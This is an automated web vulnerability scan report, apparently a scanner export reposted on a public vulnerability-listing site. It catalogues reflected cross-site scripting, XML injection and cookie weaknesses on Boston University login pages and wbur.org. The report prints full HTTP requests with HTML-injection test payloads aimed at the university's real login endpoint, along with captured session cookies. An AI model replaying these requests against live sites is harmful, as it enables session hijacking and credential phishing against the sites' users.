XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, bu.edu

Report generated by XSS.CX at Wed Oct 05 13:58:55 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. Cross-site scripting (reflected)

1.1. https://weblogin.bu.edu//web@login3 [br parameter]

1.2. https://weblogin.bu.edu//web@login3 [fl parameter]

1.3. https://weblogin.bu.edu//web@login3 [jsv parameter]

1.4. https://weblogin.bu.edu//web@login3 [name of an arbitrarily supplied request parameter]

1.5. https://weblogin.bu.edu/accounts/forgot [_authref parameter]

1.6. https://weblogin.bu.edu/accounts/forgot [_hostname parameter]

1.7. https://weblogin.bu.edu/web@login3 [br parameter]

1.8. https://weblogin.bu.edu/web@login3 [fl parameter]

1.9. https://weblogin.bu.edu/web@login3 [jsv parameter]

1.10. https://weblogin.bu.edu/web@login3 [name of an arbitrarily supplied request parameter]

1.11. https://www.bu.edu/phpbin/telegraph/ [comments parameter]

1.12. https://www.bu.edu/phpbin/telegraph/ [fund_other parameter]

1.13. http://www.wbur.org/arts-calendar/ [url parameter]

1.14. http://www.wbur.org/content/news/arts-culture [name of an arbitrarily supplied request parameter]

1.15. http://www.wbur.org/content/news/boston [name of an arbitrarily supplied request parameter]

1.16. http://www.wbur.org/content/news/economy-business [name of an arbitrarily supplied request parameter]

1.17. http://www.wbur.org/content/news/health [name of an arbitrarily supplied request parameter]

1.18. http://www.wbur.org/content/news/nation [name of an arbitrarily supplied request parameter]

1.19. http://www.wbur.org/content/news/politics [name of an arbitrarily supplied request parameter]

1.20. http://www.wbur.org/content/news/science-technology [name of an arbitrarily supplied request parameter]

1.21. http://www.wbur.org/content/news/sports [name of an arbitrarily supplied request parameter]

1.22. http://www.wbur.org/content/news/world [name of an arbitrarily supplied request parameter]

1.23. http://www.wbur.org/email-this [link parameter]

1.24. http://www.wbur.org/email-this [link parameter]

1.25. http://www.wbur.org/email-this [name of an arbitrarily supplied request parameter]

1.26. http://www.wbur.org/email-this [story parameter]

1.27. http://www.wbur.org/email-this [story parameter]

1.28. http://www.wbur.org/email-this [story parameter]

1.29. http://www.wbur.org/media-player [title parameter]

1.30. http://www.wbur.org/media-player [title parameter]

1.31. http://www.wbur.org/media-player [url parameter]

1.32. https://weblogin.bu.edu/accounts/forgot [weblogin3 cookie]

1.33. https://weblogin.bu.edu/webnew/alumnew [weblogin3 cookie]

2. XML injection

2.1. https://www.bu.edu/link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin [REST URL parameter 1]

2.2. https://www.bu.edu/link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin [REST URL parameter 2]

2.3. https://www.bu.edu/link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin [REST URL parameter 3]

3. Session token in URL

4. Password field with autocomplete enabled

5. SSL cookie without secure flag set

5.1. https://weblogin.bu.edu//web@login3

5.2. https://weblogin.bu.edu/accounts/bulogin-forgotaccount

5.3. https://weblogin.bu.edu/accounts/content/js/main.js

5.4. https://weblogin.bu.edu/accounts/forgot

5.5. https://weblogin.bu.edu/favicon.ico

5.6. https://weblogin.bu.edu/lib/css/style.css

5.7. https://weblogin.bu.edu/lib/images/form-bg.jpg

5.8. https://weblogin.bu.edu/lib/images/subsig-large.gif

5.9. https://weblogin.bu.edu/lib/scripts/BUweblogin.js

5.10. https://weblogin.bu.edu/web@login3

5.11. https://weblogin.bu.edu/web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1

5.12. https://weblogin.bu.edu/web@login3/1317837446/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837446.11881

5.13. https://weblogin.bu.edu/web@login3/1317837562/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4

5.14. https://weblogin.bu.edu/web@login3/1317837693/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837693.11207

5.15. https://weblogin.bu.edu/web@login3/1317837749/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837749.14309

5.16. https://weblogin.bu.edu/web@login3/1317837809/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837809.14786

5.17. https://weblogin.bu.edu/weblogin/webnew/bu-filler-head.gif

5.18. https://weblogin.bu.edu/weblogin/webnew/bu-filler.gif

5.19. https://weblogin.bu.edu/weblogin/webnew/footer.gif

5.20. https://weblogin.bu.edu/weblogin/webnew/main-title.gif

5.21. https://weblogin.bu.edu/weblogin/webnew/sub_title.gif

5.22. https://weblogin.bu.edu/webnew/alumnew

5.23. https://www.bu.edu/

5.24. https://www.bu.edu/alumni-forms/forms/annualfund/index.html

5.25. https://www.bu.edu/alumni-forms/forms/ath/

5.26. https://www.bu.edu/alumni-forms/forms/giving/online/index/

5.27. https://www.bu.edu/alumni-forms/images/happygroup.jpg

5.28. https://www.bu.edu/alumni/

5.29. https://www.bu.edu/favicon.ico

5.30. https://www.bu.edu/help/tech/

5.31. https://www.bu.edu/help/tech/qa/

5.32. https://www.bu.edu/link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin

5.33. https://www.bu.edu/link/bin/uiscgi_studentlink

5.34. https://www.bu.edu/phpbin/search/cms.php

5.35. https://www.bu.edu/phpbin/telegraph/

5.36. https://www.bu.edu/tech/about/

5.37. https://www.bu.edu/tech/accounts/wireless/

5.38. https://www.bu.edu/tech/contact/

5.39. https://www.bu.edu/tech/feed/

5.40. https://www.bu.edu/tech/policies/

5.41. https://www.bu.edu/tech/projects/

5.42. https://www.bu.edu/tech/service/

5.43. https://www.bu.edu/tech/services/alumni/

5.44. https://www.bu.edu/tech/services/departments/

5.45. https://www.bu.edu/tech/services/faculty/

5.46. https://www.bu.edu/tech/services/researchers/

5.47. https://www.bu.edu/tech/services/staff/

5.48. https://www.bu.edu/tech/services/students/

6. Cookie scoped to parent domain

6.1. https://weblogin.bu.edu//web@login3

6.2. https://weblogin.bu.edu/accounts/bulogin-forgotaccount

6.3. https://weblogin.bu.edu/accounts/content/js/main.js

6.4. https://weblogin.bu.edu/accounts/forgot

6.5. https://weblogin.bu.edu/favicon.ico

6.6. https://weblogin.bu.edu/lib/css/style.css

6.7. https://weblogin.bu.edu/lib/images/form-bg.jpg

6.8. https://weblogin.bu.edu/lib/images/subsig-large.gif

6.9. https://weblogin.bu.edu/lib/scripts/BUweblogin.js

6.10. https://weblogin.bu.edu/web@login3

6.11. https://weblogin.bu.edu/web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1

6.12. https://weblogin.bu.edu/web@login3/1317837446/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837446.11881

6.13. https://weblogin.bu.edu/web@login3/1317837562/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4

6.14. https://weblogin.bu.edu/web@login3/1317837693/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837693.11207

6.15. https://weblogin.bu.edu/web@login3/1317837749/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837749.14309

6.16. https://weblogin.bu.edu/web@login3/1317837809/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837809.14786

6.17. https://weblogin.bu.edu/weblogin/webnew/bu-filler-head.gif

6.18. https://weblogin.bu.edu/weblogin/webnew/bu-filler.gif

6.19. https://weblogin.bu.edu/weblogin/webnew/footer.gif

6.20. https://weblogin.bu.edu/weblogin/webnew/main-title.gif

6.21. https://weblogin.bu.edu/weblogin/webnew/sub_title.gif

6.22. https://weblogin.bu.edu/webnew/alumnew

6.23. https://www.bu.edu/

6.24. https://www.bu.edu/alumni-forms/forms/annualfund/index.html

6.25. https://www.bu.edu/alumni-forms/forms/ath/

6.26. https://www.bu.edu/alumni-forms/forms/giving/online/index/

6.27. https://www.bu.edu/alumni-forms/images/happygroup.jpg

6.28. https://www.bu.edu/alumni/

6.29. https://www.bu.edu/favicon.ico

6.30. https://www.bu.edu/help/tech/

6.31. https://www.bu.edu/help/tech/qa/

6.32. https://www.bu.edu/link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin

6.33. https://www.bu.edu/link/bin/uiscgi_studentlink

6.34. https://www.bu.edu/phpbin/search/cms.php

6.35. https://www.bu.edu/phpbin/telegraph/

6.36. https://www.bu.edu/tech/about/

6.37. https://www.bu.edu/tech/accounts/wireless/

6.38. https://www.bu.edu/tech/contact/

6.39. https://www.bu.edu/tech/feed/

6.40. https://www.bu.edu/tech/policies/

6.41. https://www.bu.edu/tech/projects/

6.42. https://www.bu.edu/tech/service/

6.43. https://www.bu.edu/tech/services/alumni/

6.44. https://www.bu.edu/tech/services/departments/

6.45. https://www.bu.edu/tech/services/faculty/

6.46. https://www.bu.edu/tech/services/researchers/

6.47. https://www.bu.edu/tech/services/staff/

6.48. https://www.bu.edu/tech/services/students/

7. Cross-domain Referer leakage

7.1. http://www.wbur.org/email-this

7.2. http://www.wbur.org/embed.js

7.3. http://www.wbur.org/media-player

7.4. http://www.wbur.org/search

8. Cross-domain script include

8.1. http://www.wbur.org/

8.2. http://www.wbur.org/2011/10/03/brown-on-poll

8.3. http://www.wbur.org/2011/10/03/massachusetts-senate-democrats

8.4. http://www.wbur.org/2011/10/04/caroline-kennedy

8.5. http://www.wbur.org/2011/10/04/mass-gambling-5

8.6. http://www.wbur.org/2011/10/04/massachusetts-tax-receipts

8.7. http://www.wbur.org/2011/10/04/senate-debate-10

8.8. http://www.wbur.org/2011/10/05/adl-anti-semitism-on-the-rise

8.9. http://www.wbur.org/2011/10/05/attleboro-councilor

8.10. http://www.wbur.org/2011/10/05/democrats-debate

8.11. http://www.wbur.org/2011/10/05/dui-charges

8.12. http://www.wbur.org/2011/10/05/friendlys-closing

8.13. http://www.wbur.org/2011/10/05/north-shore-flooding

8.14. http://www.wbur.org/2011/10/05/state-reserves

8.15. http://www.wbur.org/about

8.16. http://www.wbur.org/about/2011-schorr-prize

8.17. http://www.wbur.org/about/directions

8.18. http://www.wbur.org/about/jobs

8.19. http://www.wbur.org/about/privacy

8.20. http://www.wbur.org/about/reporting-copyright-infringement

8.21. http://www.wbur.org/arts-calendar

8.22. http://www.wbur.org/community

8.23. http://www.wbur.org/community/rules

8.24. http://www.wbur.org/contact

8.25. http://www.wbur.org/content/news/arts-culture

8.26. http://www.wbur.org/content/news/boston

8.27. http://www.wbur.org/content/news/economy-business

8.28. http://www.wbur.org/content/news/health

8.29. http://www.wbur.org/content/news/nation

8.30. http://www.wbur.org/content/news/politics

8.31. http://www.wbur.org/content/news/science-technology

8.32. http://www.wbur.org/content/news/sports

8.33. http://www.wbur.org/content/news/world

8.34. http://www.wbur.org/email-this

8.35. http://www.wbur.org/embed.js

8.36. http://www.wbur.org/listen

8.37. http://www.wbur.org/listen/podcasts

8.38. http://www.wbur.org/media-player

8.39. http://www.wbur.org/npr/140401106/the-thinnest-state-loosens-its-belt

8.40. http://www.wbur.org/npr/140947193/terrorists-in-love-the-psychology-of-extremism

8.41. http://www.wbur.org/npr/140947830/in-homeland-its-hard-to-know-whom-to-trust

8.42. http://www.wbur.org/npr/140961754/eating-meals-with-men-may-mean-eating-less

8.43. http://www.wbur.org/npr/141011341/wh

8.44. http://www.wbur.org/npr/141013682/wnba-has-higher-tv-ratings-but-uncertain-future

8.45. http://www.wbur.org/npr/141045337/will-christie-be-shermanesque

8.46. http://www.wbur.org/npr/141046490/mississippis-jobs-program-a-new-national-model

8.47. http://www.wbur.org/npr/141047227/the-luxurious-revenue-college-sports-model

8.48. http://www.wbur.org/npr/141048472/whats-its-like-to-live-on-the-lam

8.49. http://www.wbur.org/npr/141048505/jacques-pepin-selects-his-essential-favorites

8.50. http://www.wbur.org/npr/141052309/authentic-egyptian-music-is-from-the-streets

8.51. http://www.wbur.org/npr/141052852/even-in-lebanon-no-safe-haven-for-syrian-dissidents

8.52. http://www.wbur.org/npr/141053373/thin-moms-and-dads-pass-on-skinny-genes

8.53. http://www.wbur.org/npr/141057189/my-smartphone-is-a-microscope-what-can-yours-do

8.54. http://www.wbur.org/npr/141062091/is-nostalgia-enough-to-save-friendlys

8.55. http://www.wbur.org/npr/141071545/bible-belt-oktoberfest-finally-taps-a-beer-keg

8.56. http://www.wbur.org/npr/141071652/clerk-inadvertently-helps-ga-woman-win-powerball

8.57. http://www.wbur.org/npr/141071655/occupy-wall-street-college-students-urged-to-walk-out-today

8.58. http://www.wbur.org/npr/141080655/afghan-officials-say-plot-to-kill-karzai-foiled

8.59. http://www.wbur.org/npr/people/104192887/mark-memmott

8.60. http://www.wbur.org/npr/people/2100182/deborah-amos

8.61. http://www.wbur.org/npr/people/2100422/frank-deford

8.62. http://www.wbur.org/npr/people/2101289/nina-totenberg

8.63. http://www.wbur.org/npr/people/3800445/tovia-smith

8.64. http://www.wbur.org/people

8.65. http://www.wbur.org/people/fred-thys

8.66. http://www.wbur.org/programs

8.67. http://www.wbur.org/programs/atc

8.68. http://www.wbur.org/programs/fresh-air

8.69. http://www.wbur.org/programs/morning-edition

8.70. http://www.wbur.org/programs/schedule

8.71. http://www.wbur.org/programs/talk

8.72. http://www.wbur.org/programs/wait-wait

8.73. http://www.wbur.org/programs/wesat

8.74. http://www.wbur.org/programs/wesun

8.75. http://www.wbur.org/search

8.76. http://www.wbur.org/support

8.77. http://www.wbur.org/support/newsmaker

8.78. http://www.wbur.org/support/upcoming-events

8.79. http://www.wbur.org/support/volunteer

8.80. http://www.wbur.org/traffic

8.81. http://www.wbur.org/underwriting

8.82. http://www.wbur.org/updates

8.83. http://www.wbur.org/weather

8.84. http://www.wbur.org/wp-content/plugins/disqus-comment-system/xd_receiver.htm

9. Cookie without HttpOnly flag set

9.1. https://weblogin.bu.edu//web@login3

9.2. https://weblogin.bu.edu/accounts/bulogin-forgotaccount

9.3. https://weblogin.bu.edu/accounts/content/js/main.js

9.4. https://weblogin.bu.edu/accounts/forgot

9.5. https://weblogin.bu.edu/favicon.ico

9.6. https://weblogin.bu.edu/lib/css/style.css

9.7. https://weblogin.bu.edu/lib/images/form-bg.jpg

9.8. https://weblogin.bu.edu/lib/images/subsig-large.gif

9.9. https://weblogin.bu.edu/lib/scripts/BUweblogin.js

9.10. https://weblogin.bu.edu/web@login3

9.11. https://weblogin.bu.edu/web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1

9.12. https://weblogin.bu.edu/web@login3/1317837446/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837446.11881

9.13. https://weblogin.bu.edu/web@login3/1317837562/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4

9.14. https://weblogin.bu.edu/web@login3/1317837693/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837693.11207

9.15. https://weblogin.bu.edu/web@login3/1317837749/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837749.14309

9.16. https://weblogin.bu.edu/web@login3/1317837809/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837809.14786

9.17. https://weblogin.bu.edu/weblogin/webnew/bu-filler-head.gif

9.18. https://weblogin.bu.edu/weblogin/webnew/bu-filler.gif

9.19. https://weblogin.bu.edu/weblogin/webnew/footer.gif

9.20. https://weblogin.bu.edu/weblogin/webnew/main-title.gif

9.21. https://weblogin.bu.edu/weblogin/webnew/sub_title.gif

9.22. https://weblogin.bu.edu/webnew/alumnew

9.23. https://www.bu.edu/

9.24. https://www.bu.edu/alumni-forms/forms/annualfund/index.html

9.25. https://www.bu.edu/alumni-forms/forms/ath/

9.26. https://www.bu.edu/alumni-forms/forms/giving/online/index/

9.27. https://www.bu.edu/alumni-forms/images/happygroup.jpg

9.28. https://www.bu.edu/alumni/

9.29. https://www.bu.edu/favicon.ico

9.30. https://www.bu.edu/help/tech/

9.31. https://www.bu.edu/help/tech/qa/

9.32. https://www.bu.edu/link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin

9.33. https://www.bu.edu/link/bin/uiscgi_studentlink

9.34. https://www.bu.edu/phpbin/search/cms.php

9.35. https://www.bu.edu/phpbin/telegraph/

9.36. https://www.bu.edu/tech/about/

9.37. https://www.bu.edu/tech/accounts/wireless/

9.38. https://www.bu.edu/tech/contact/

9.39. https://www.bu.edu/tech/feed/

9.40. https://www.bu.edu/tech/policies/

9.41. https://www.bu.edu/tech/projects/

9.42. https://www.bu.edu/tech/service/

9.43. https://www.bu.edu/tech/services/alumni/

9.44. https://www.bu.edu/tech/services/departments/

9.45. https://www.bu.edu/tech/services/faculty/

9.46. https://www.bu.edu/tech/services/researchers/

9.47. https://www.bu.edu/tech/services/staff/

9.48. https://www.bu.edu/tech/services/students/

10. Email addresses disclosed

10.1. https://weblogin.bu.edu/accounts/bulogin-forgotaccount

10.2. https://weblogin.bu.edu/accounts/forgot

10.3. https://weblogin.bu.edu/webnew/alumnew

10.4. https://www.bu.edu/alumni-forms/forms/annualfund/index.html

10.5. https://www.bu.edu/alumni-forms/forms/ath/

10.6. https://www.bu.edu/alumni-forms/forms/giving/online/index/

10.7. https://www.bu.edu/alumni/

10.8. https://www.bu.edu/link/bin/uiscgi_studentlink

10.9. https://www.bu.edu/phpbin/telegraph/

10.10. https://www.bu.edu/tech/about/

10.11. https://www.bu.edu/tech/accounts/wireless/

10.12. https://www.bu.edu/tech/contact/

10.13. https://www.bu.edu/tech/policies/

10.14. https://www.bu.edu/tech/projects/

10.15. https://www.bu.edu/tech/service/

10.16. https://www.bu.edu/tech/services/alumni/

10.17. https://www.bu.edu/tech/services/departments/

10.18. https://www.bu.edu/tech/services/faculty/

10.19. https://www.bu.edu/tech/services/researchers/

10.20. https://www.bu.edu/tech/services/staff/

10.21. https://www.bu.edu/tech/services/students/

10.22. http://www.wbur.org/about/jobs

10.23. http://www.wbur.org/about/privacy

10.24. http://www.wbur.org/about/reporting-copyright-infringement

10.25. http://www.wbur.org/contact

10.26. http://www.wbur.org/support/newsmaker

10.27. http://www.wbur.org/support/upcoming-events

10.28. http://www.wbur.org/support/volunteer

11. Cacheable HTTPS response

11.1. https://weblogin.bu.edu/favicon.ico

11.2. https://weblogin.bu.edu/webnew/alumnew

11.3. https://www.bu.edu/

11.4. https://www.bu.edu/alumni-forms/forms/annualfund/index.html

11.5. https://www.bu.edu/alumni-forms/forms/ath/

11.6. https://www.bu.edu/alumni-forms/forms/giving/online/index/

11.7. https://www.bu.edu/alumni/

11.8. https://www.bu.edu/favicon.ico

11.9. https://www.bu.edu/help/tech/

11.10. https://www.bu.edu/help/tech/qa/

11.11. https://www.bu.edu/link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin

11.12. https://www.bu.edu/link/bin/uiscgi_studentlink

11.13. https://www.bu.edu/phpbin/telegraph/

11.14. https://www.bu.edu/tech/about/

11.15. https://www.bu.edu/tech/accounts/wireless/

11.16. https://www.bu.edu/tech/contact/

11.17. https://www.bu.edu/tech/feed/

11.18. https://www.bu.edu/tech/policies/

11.19. https://www.bu.edu/tech/projects/

11.20. https://www.bu.edu/tech/service/

11.21. https://www.bu.edu/tech/services/alumni/

11.22. https://www.bu.edu/tech/services/departments/

11.23. https://www.bu.edu/tech/services/faculty/

11.24. https://www.bu.edu/tech/services/researchers/

11.25. https://www.bu.edu/tech/services/staff/

11.26. https://www.bu.edu/tech/services/students/

12. HTML does not specify charset

12.1. https://weblogin.bu.edu//web@login3

12.2. https://weblogin.bu.edu/web@login3

12.3. https://weblogin.bu.edu/web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1

12.4. https://weblogin.bu.edu/web@login3/1317837446/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837446.11881

12.5. https://weblogin.bu.edu/web@login3/1317837693/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837693.11207

12.6. https://weblogin.bu.edu/web@login3/1317837749/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837749.14309

12.7. https://weblogin.bu.edu/web@login3/1317837809/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837809.14786

12.8. https://www.bu.edu/link/bin/uiscgi_alumni_directory_harris_xml.pl/PreLogin

12.9. https://www.bu.edu/link/bin/uiscgi_studentlink

12.10. http://www.wbur.org/wp-content/plugins/disqus-comment-system/xd_receiver.htm

13. Content type incorrectly stated

13.1. https://weblogin.bu.edu/favicon.ico

13.2. https://www.bu.edu/favicon.ico



1. Cross-site scripting (reflected)  next
There are 33 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://weblogin.bu.edu//web@login3 [br parameter]  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://weblogin.bu.edu
Path:   //web@login3

Issue detail

The value of the br request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25dba"><a>56d8f40e6aa was submitted in the br parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET //web@login3?jsv=1.5p&br=un25dba"><a>56d8f40e6aa&fl=0 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://weblogin.bu.edu/web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; isMobile=false_1.1; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:13 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: up
X-UniqueID: ToyYmQrxHDsAAFm8MK4
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:49:13 GMT
Set-Cookie: wl4cap=1317836953%2Cjsver%3D1.5p%2Cbrowser%3D%2Cflash%3D0; path=/
X-BU-Main-Uniqueid: ToyYmQrxHDsAAFhgGdYAAAAo
X-BU-Duration: D=430522
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 2750

<!DOCTYPE html>
<html class="no-js">
<head>
<meta charset="UTF-8">
<title>Boston University | Web Login</title>

<!-- InstanceBegin name="header_template" -->

<link rel="stylesheet" type="t
...[SNIP]...
<a href="https://weblogin.bu.edu/web@login3?jsv=1.5p&br=un25dba"><a>56d8f40e6aa&fl=0&wantsMobile=true">
...[SNIP]...

1.2. https://weblogin.bu.edu//web@login3 [fl parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://weblogin.bu.edu
Path:   //web@login3

Issue detail

The value of the fl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29178"><a>6e4aa055633 was submitted in the fl parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET //web@login3?jsv=1.5p&br=un&fl=029178"><a>6e4aa055633 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://weblogin.bu.edu/web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; isMobile=false_1.1; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:35 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: up
X-UniqueID: ToyYrwrxHDsAAFlFLU0
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:49:35 GMT
Set-Cookie: wl4cap=1317836975%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D; path=/
X-BU-Main-Uniqueid: ToyYrwrxHDsAAFj1jRAAAABK
X-BU-Duration: D=391908
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 2750

<!DOCTYPE html>
<html class="no-js">
<head>
<meta charset="UTF-8">
<title>Boston University | Web Login</title>

<!-- InstanceBegin name="header_template" -->

<link rel="stylesheet" type="t
...[SNIP]...
